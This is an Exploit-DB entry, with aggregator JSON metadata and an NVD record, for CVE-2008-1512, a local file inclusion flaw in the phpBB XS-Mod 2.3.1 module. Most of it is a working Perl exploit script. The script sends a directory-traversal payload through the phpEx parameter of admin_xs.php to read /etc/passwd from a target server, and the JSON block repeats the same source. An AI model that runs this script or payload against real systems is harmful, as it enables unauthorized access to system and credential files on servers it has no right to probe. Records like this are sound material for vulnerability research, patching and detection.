ID EDB-ID:5301
Type exploitdb
Reporter bd0rk
Modified 2008-03-24T00:00:00
Description
phpBB Module XS-Mod 2.3.1 Local File Inclusion Vulnerability. CVE-2008-1512. Webapps exploit for php platform
..%%%%....%%%%...%%..%%...........%%%%...%%%%%...%%%%%%..%%...%%.
.%%......%%..%%..%%..%%..........%%..%%..%%..%%..%%......%%...%%.
..%%%%...%%..%%..%%%%%%..%%%%%%..%%......%%%%%...%%%%....%%.%.%%.
.....%%..%%..%%..%%..%%..........%%..%%..%%..%%..%%......%%%%%%%.
..%%%%....%%%%...%%..%%...........%%%%...%%..%%..%%%%%%...%%.%%..
.................................................................
[+] Software: phpBB Module XS 2.3.1
[+] Vendor: http://www.phpbbmods.de
[+] Download: http://www.phpbbmods.de/downloads.php?view=detail&id=3
[~] Vulnerability found by: bd0rk
[~] Contact: bd0rk[at]hackermail.com
[~] Website: http://www.soh-crew.it.tt
[~] Greetings: str0ke, TheJT, maria
[+] Vulnerable Code in /admin/admin_xs.php line 33
[+] Code: include_once('xs_include.' . $phpEx);
[+] It is a local file inclusion
[+]Exploitcode:
use LWP::UserAgent;
use HTTP::Request;
use LWP::Simple;
print "\t\t+++++++++++++++++++++++++++++++++++++++++++++++++++\n\n";
print "\t\t+ +\n\n";
print "\t\t+ phpBB Module XS 2.3.1 Local File Inclusion Expl +\n\n";
print "\t\t+ +\n\n";
print "\t\t+++++++++++++++++++++++++++++++++++++++++++++++++++\n\n";
if (!$ARGV[0])
{
print "Usage: expl.pl [target]\n";
print "Example: expl.pl http://127.0.0.1/directory/admin/\n";
}
else
{
$web=$ARGV[0];
chomp $web;
$file="admin_xs.php?phpEx=../../../../../../../../../../../../../../../../etc/passwd%00";
my $web1=$web.$file;
print "$web1\n\n";
my $agent = LWP::UserAgent->new;
my $req=HTTP::Request->new(GET=>$web1);
$doc = $agent->request($req)->as_string;
if ($doc=~ /^root/moxis ){
print "This is vulnerable\n";
}
else
{
print "It is not vulnerable\n";
}
}
# milw0rm.com [2008-03-24]
{"id": "EDB-ID:5301", "hash": "86d418fbfb934505ef37b5380ebe1540", "type": "exploitdb", "bulletinFamily": "exploit", "title": "phpBB Module XS-Mod 2.3.1 - Local File Inclusion Vulnerability", "description": "phpBB Module XS-Mod 2.3.1 Local File Inclusion Vulnerability. CVE-2008-1512. Webapps exploit for php platform", "published": "2008-03-24T00:00:00", "modified": "2008-03-24T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/5301/", "reporter": "bd0rk", "references": [], "cvelist": ["CVE-2008-1512"], "lastseen": "2016-01-31T22:55:55", "history": [], "viewCount": 6, "enchantments": {"score": {"value": 7.0, "vector": "NONE", "modified": "2016-01-31T22:55:55"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-1512"]}], "modified": "2016-01-31T22:55:55"}, "vulnersScore": 7.0}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/5301/", "sourceData": " ..%%%%....%%%%...%%..%%...........%%%%...%%%%%...%%%%%%..%%...%%.\n .%%......%%..%%..%%..%%..........%%..%%..%%..%%..%%......%%...%%.\n ..%%%%...%%..%%..%%%%%%..%%%%%%..%%......%%%%%...%%%%....%%.%.%%.\n .....%%..%%..%%..%%..%%..........%%..%%..%%..%%..%%......%%%%%%%.\n ..%%%%....%%%%...%%..%%...........%%%%...%%..%%..%%%%%%...%%.%%..\n .................................................................\n\n[+] Software: phpBB Module XS 2.3.1\n[+] Vendor: http://www.phpbbmods.de\n[+] Download: http://www.phpbbmods.de/downloads.php?view=detail&id=3\n\n[~] Vulnerability found by: bd0rk\n[~] Contact: bd0rk[at]hackermail.com\n[~] Website: http://www.soh-crew.it.tt\n[~] Greetings: str0ke, TheJT, maria\n\n[+] Vulnerable Code in /admin/admin_xs.php line 33\n[+] Code: include_once('xs_include.' . $phpEx);\n[+] It is a local file inclusion\n\n[+]Exploitcode:\n\nuse LWP::UserAgent;\nuse HTTP::Request;\nuse LWP::Simple;\n\nprint \"\\t\\t+++++++++++++++++++++++++++++++++++++++++++++++++++\\n\\n\";\nprint \"\\t\\t+ +\\n\\n\";\nprint \"\\t\\t+ phpBB Module XS 2.3.1 Local File Inclusion Expl +\\n\\n\";\nprint \"\\t\\t+ +\\n\\n\";\nprint \"\\t\\t+++++++++++++++++++++++++++++++++++++++++++++++++++\\n\\n\";\n\nif (!$ARGV[0])\n{\nprint \"Usage: expl.pl [target]\\n\";\nprint \"Example: expl.pl http://127.0.0.1/directory/admin/\\n\";\n}\n\nelse\n{\n$web=$ARGV[0];\nchomp $web;\n\n$file=\"admin_xs.php?phpEx=../../../../../../../../../../../../../../../../etc/passwd%00\";\n\nmy $web1=$web.$file;\nprint \"$web1\\n\\n\";\nmy $agent = LWP::UserAgent->new;\nmy $req=HTTP::Request->new(GET=>$web1);\n$doc = $agent->request($req)->as_string;\n\nif ($doc=~ /^root/moxis ){\nprint \"This is vulnerable\\n\";\n}\nelse\n{\nprint \"It is not vulnerable\\n\";\n}\n}\n\n# milw0rm.com [2008-03-24]\n", "osvdbidlist": ["43665"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2019-05-29T18:09:25", "bulletinFamily": "NVD", "description": "Directory traversal vulnerability in admin/admin_xs.php in eXtreme Styles module (XS-Mod) 2.3.1 and 2.4.0 for phpBB allows remote attackers to include and execute arbitrary files via a .. (dot dot) in the phpEx parameter. NOTE: some of these details are obtained from third party information.", "modified": "2017-09-29T01:30:00", "id": "CVE-2008-1512", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-1512", "published": "2008-03-25T23:44:00", "title": "CVE-2008-1512", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}